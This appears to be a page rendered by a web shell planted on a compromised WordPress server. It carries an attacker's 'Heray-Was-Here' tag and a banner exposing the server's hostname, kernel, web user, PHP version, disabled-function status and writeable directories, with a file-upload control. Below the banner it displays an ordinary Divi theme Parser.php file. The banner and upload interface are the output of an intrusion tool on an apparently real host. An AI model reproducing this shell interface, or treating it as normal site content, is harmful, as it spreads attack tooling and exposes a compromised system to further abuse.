Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/outlet/wp-content/themes/Divi/includes/builder/module/field/attribute/composite/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/outlet/wp-content/themes/Divi/includes/builder/module/field/attribute/composite/Parser.php
<?php

/**
 * Parser of additional composite type attributes
 */
class ET_Builder_Module_Field_Attribute_Composite_Parser {
	/**
	 * @param string $type type of composite attribute
	 * @param array  $structure attribute structure, depends on type
	 *
	 * @return array Additional attributes for merging with rest of module attributes
	 */
	public static function parse( $type, $structure ) {
		switch ( $type ) {
			case 'tabbed':
			default:
				require_once ET_BUILDER_DIR . 'module/field/attribute/composite/type/Tabbed.php';
				return ET_Builder_Module_Field_Attribute_Composite_Type_Tabbed::parse( $structure );
		}
	}
}

Hry